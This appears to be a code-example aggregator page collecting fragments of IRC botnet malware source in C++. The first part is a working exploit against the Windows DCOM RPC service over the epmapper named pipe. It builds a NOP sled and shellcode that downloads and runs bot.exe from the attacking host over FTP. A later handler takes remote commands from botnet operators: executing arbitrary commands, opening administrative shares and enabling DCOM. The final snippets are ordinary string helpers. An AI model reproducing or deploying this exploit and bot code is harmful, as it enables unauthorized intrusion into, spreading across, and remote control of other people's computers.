			m_sSocket.Disconnect(); return true;
		}
		break;
	case 445:
		{
#ifdef _WIN32
			NETRESOURCEW nr; bool bRetVal=false;
			if(!ConnectViaNullSession(m_sSocket.m_szHost, &nr)) return bRetVal;
			else
			{	int iHostOS=FpHost(m_sSocket.m_szHost, FP_NP);
				if(iHostOS==OS_UNKNOWN) iHostOS=FpHost(m_sSocket.m_szHost, FP_SMB);
				char szPipePath[MAX_PATH];
				sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", m_sSocket.m_szHost);
    
				HANDLE hFile=CreateFile(szPipePath, GENERIC_WRITE|GENERIC_READ, FILE_SHARE_READ, \
					NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
  
				if(hFile!=INVALID_HANDLE_VALUE)
				{	
					SendLocal("%s: connected to pipe \\\\%s\\pipe\\epmapper.", m_sScannerName.CStr(), m_sSocket.m_szHost);
					char szSCBuf[4096]; char szReqBuf[4096]; char szShellBuf[4096];
					int iShellSize=0, iPos=0, iSCSize=0, iReqSize=0, iNOPSize=sizeof(nops)-1;
					char *pTemp;

					CString sURL;

					if(IsPrivate(g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) && !IsPrivate(m_sSocket.m_szHost))
						sURL.Format("ftp://bla:bla@%s:%d/bot.exe", g_pMainCtrl->m_cIRC.m_sLocalHost.CStr(), \
							g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
					else
						sURL.Format("ftp://bla:bla@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
							g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);

					iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
					
					// Build a buffer with the shellcode
					memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
					memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
					memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
					iSCSize=iPos; iPos=0;

					// Prepend NOPs as long as shellcode doesn't fit RPC packet format
					while(iSCSize%16!=12)
					{	char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++;
						memcpy(szSCBuf+iPos,	shellcode_start,	sizeof(shellcode_start)-1	); iPos+=sizeof(shellcode_start)-1;
						memset(szSCBuf+iPos,	'\x90',				iNOPSize					); iPos+=iNOPSize;
						memcpy(szSCBuf+iPos,	szShellBuf,			iShellSize					); iPos+=iShellSize;
						iSCSize=iPos; iPos=0; free(szTemp); }

					// Set the return address
					if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN)
						memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
					else
						memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);

					// Build the request
					memcpy(szReqBuf+iPos,	request1,			sizeof(request1)-1			); iPos+=sizeof(request1)-1;
					memcpy(szReqBuf+iPos,	request2,			sizeof(request2)-1			); iPos+=sizeof(request2)-1;
					memcpy(szReqBuf+iPos,	szSCBuf,			iSCSize						); iPos+=iSCSize;
					memcpy(szReqBuf+iPos,	request3,			sizeof(request3)-1			); iPos+=sizeof(request3)-1;
					memcpy(szReqBuf+iPos,	request4,			sizeof(request4)-1			); iPos+=sizeof(request4)-1;
					iReqSize=iPos;

					pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes
					*(unsigned long*)(pTemp)		= *(unsigned long*)(pTemp)		+ iSCSize / 2;
					*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize / 2; pTemp=szReqBuf;
					*(unsigned long*)(pTemp+8)		= *(unsigned long*)(pTemp+8)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+16)		= *(unsigned long*)(pTemp+16)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+128)	= *(unsigned long*)(pTemp+128)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+132)	= *(unsigned long*)(pTemp+132)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+180)	= *(unsigned long*)(pTemp+180)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+184)	= *(unsigned long*)(pTemp+184)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+208)	= *(unsigned long*)(pTemp+208)	+ iSCSize - 12;
					*(unsigned long*)(pTemp+396)	= *(unsigned long*)(pTemp+396)	+ iSCSize - 12;

					unsigned long lWritten; char *szInBuf=(char*)malloc(100000); memset(szInBuf, 0, 100000);
					// Send the bind string
					DWORD dwRead; TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
					if(szInBuf[2]!=0x0C) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }
					// Send the evil request
					if(!WriteFile(hFile, szReqBuf, iReqSize, &lWritten, 0)) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }
					if(!ReadFile(hFile, szInBuf, 10000, &dwRead, NULL)) bRetVal=true; else bRetVal=false;
					free(szInBuf); }

				CloseHandle(hFile);
				CloseNullSession(m_sSocket.m_szHost); }
			return bRetVal;
#endif // _WIN32
		}
		break;
	default:
		return false;
		break;
	}

	return false;
}
Example #9
0
bool CBot::HandleCommand(CMessage *pMsg)
{	
	if(!pMsg->sCmd.Compare("bot.remove") || !pMsg->sCmd.Compare("bot.removeallbut")) {
		CString sId(pMsg->sChatString.Token(1, " ", true));
		if(!pMsg->sCmd.Compare("bot.removeallbut")) if(!sId.Compare(g_pMainCtrl->m_cBot.bot_id.sValue)) return false;
		g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "removing bot...", pMsg->sReplyTo);
#ifdef WIN32
		/// should unsecure system as remove bot to allow recycling //
		
		// Set EnableDCOM to "Y"
		HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128];
		strcpy(szDataBuf, "Y"); dwSize=strlen(szDataBuf);
		LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey);
		RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
		RegCloseKey(hkey);

		// UnSecure Shares
		Execute("net.exe", "net share c$=c:\\");
		Execute("net.exe", "net share d$=d:\\");
		Execute("net.exe", "net share e$=e:\\");
		Execute("net.exe", "net share ipc$");
		Execute("net.exe", "net share admin$");

		// Delete Autostart
		if(g_pMainCtrl->m_cBot.as_enabled.bValue)
			g_pMainCtrl->m_cInstaller.RegStartDel(g_pMainCtrl->m_cBot.as_valname.sValue);
		if(g_pMainCtrl->m_cBot.as_service.bValue)
			g_pMainCtrl->m_cInstaller.ServiceDel(g_pMainCtrl->m_cBot.as_service_name.sValue);
#endif
		g_pMainCtrl->m_cInstaller.Uninstall();
		g_pMainCtrl->m_cIRC.m_bRunning=false; g_pMainCtrl->m_bRunning=false; }

	else if(!pMsg->sCmd.Compare("bot.execute")) {
		CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1;
#ifdef WIN32
		CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables
		sText.Assign(sTextExp); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo;
		memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb=sizeof(sinfo);
		if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE;
		if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) {
			g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute file.", pMsg->sReplyTo.Str()); return false; }
#else
		CString sCmdBuf; sCmdBuf.Format("/bin/sh -c \"%s\"", sText.CStr());
		if(system(sCmdBuf.CStr())==-1) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute file.", pMsg->sReplyTo.Str()); return false; }
#endif
		return true; }

	else if(!pMsg->sCmd.Compare("bot.open")) {
		if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false;
		CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false;
#ifdef WIN32
		bRet=(int)ShellExecute(0, "open", sText.CStr(), NULL, NULL, SW_SHOW)>=32;
#else
		bRet=system(sText.CStr())>0;
#endif
		if(bRet) return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str());
		else return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't open file.", pMsg->sReplyTo.Str()); }

	else if(!pMsg->sCmd.Compare("bot.dns")) {
		CString sReply; hostent *pHostent=NULL; in_addr iaddr;
		if(!pMsg->sChatString.Token(1, " ").Compare("")) return false;
		unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr());
	
		if(addr!=INADDR_NONE) {
			pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET);
			if(pHostent) {
				sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name);
				return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); }
		} else {
			pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr());
			if(pHostent) {
				iaddr=*((in_addr*)*pHostent->h_addr_list);
				sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr));
				return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } }
		
		if(!pHostent) {
			sReply.Format("couldn't resolve host \"%s\"!", pMsg->sChatString.Token(1, " ").CStr());
			return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } }

	else if(!pMsg->sCmd.Compare("bot.about")) {
		CString sReplyBuf; sReplyBuf.Format("%s", g_pMainCtrl->m_sNameVerStr.CStr());
		return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); }

	else if(!pMsg->sCmd.Compare("bot.id")) {
		return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); }

	else if(!pMsg->sCmd.Compare("bot.nick")) {
		g_pMainCtrl->m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr());
		g_pMainCtrl->m_cIRC.SendRawFormat("NICK %s\r\n", g_pMainCtrl->m_sUserName.CStr());
		return true; }

	else if(!pMsg->sCmd.Compare("bot.quit") || !pMsg->sCmd.Compare("bot.die")) {
		g_pMainCtrl->m_cIRC.m_bRunning=false; return true; }

	else if(!pMsg->sCmd.Compare("bot.sysinfo")) {
		return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); }

	else if(!pMsg->sCmd.Compare("bot.longuptime")) {
		int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iDays) iDays=7;
		CString sUptime=LongUptime(iDays);
		if(sUptime.Compare("")) {
			g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
				sUptime.Str(), pMsg->sReplyTo.Str()); }
		return true; }

	else if(!pMsg->sCmd.Compare("bot.status")) {
		return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, Status().Str(), pMsg->sReplyTo.Str()); }

	else if(!pMsg->sCmd.Compare("bot.rndnick")) {
		CString sRndNick=RndNick(si_nickprefix.sValue.CStr());
		g_pMainCtrl->m_cIRC.SendRawFormat("NICK %s\r\n", sRndNick.CStr());
		g_pMainCtrl->m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr());
		return true; }

	else if(!pMsg->sCmd.Compare("bot.flushdns")) {
#ifdef WIN32
		Execute("ipconfig.exe", "/flushdns");
#else
		Execute("nscd", "-i hosts");
#endif // WIN32
		return true; }

	else if(!pMsg->sCmd.Compare("bot.secure")) {	
#ifdef WIN32
		// Set EnableDCOM to "N"
		HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128];
		strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf);
		LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey);
		RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
		RegCloseKey(hkey);

		// Secure Shares
		system("net share c$ /delete /y");
		system("net share d$ /delete /y");
		system("net share ipc$ /delete /y");
		system("net share admin$ /delete /y");

		g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
				"Bot Secured", pMsg->sReplyTo.Str());

#endif
		return true; }


	else if(!pMsg->sCmd.Compare("bot.unsecure")) {	
#ifdef WIN32
		// Set EnableDCOM to "Y"
		HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128];
		strcpy(szDataBuf, "Y"); dwSize=strlen(szDataBuf);
		LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey);
		RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
		RegCloseKey(hkey);

		// UnSecure Shares
		system("net share c$=c:\\");
		system("net share d$=d:\\");
		system("net share e$=e:\\");
		system("net share ipc$");
		system("net share admin$");

		g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
				"Bot UnSecured", pMsg->sReplyTo.Str());
#endif

		return true; }




	
	else if(!pMsg->sCmd.Compare("bot.command")) {	
#ifdef WIN32
		if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false;
		CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false;
		CString sReplyBuf; sReplyBuf.Format("command (%s) executed.", sText.CStr());

		if(system(sText.CStr())==-1) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute command.", pMsg->sReplyTo.Str()); return false; }
		else { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; }
#endif
		return true; }


	return false; }
Example #10
0
 int CString::Compare(const CString& str, const size_t pos, const size_t len) const {
   return Compare(str.Str(), pos, len);
 }
Example #11
0
 int CString::Compare(const CString& str) const {
   return Compare(str.Str(), str.Length());
 }
Example #12
0
 size_t CString::Pos(const CString& str, const size_t pos) const {
   return Pos(str.Str(), pos);
 }
Example #13
0
 size_t CString::Pos(const CString& str) const{
   return Pos(str.Str());
 }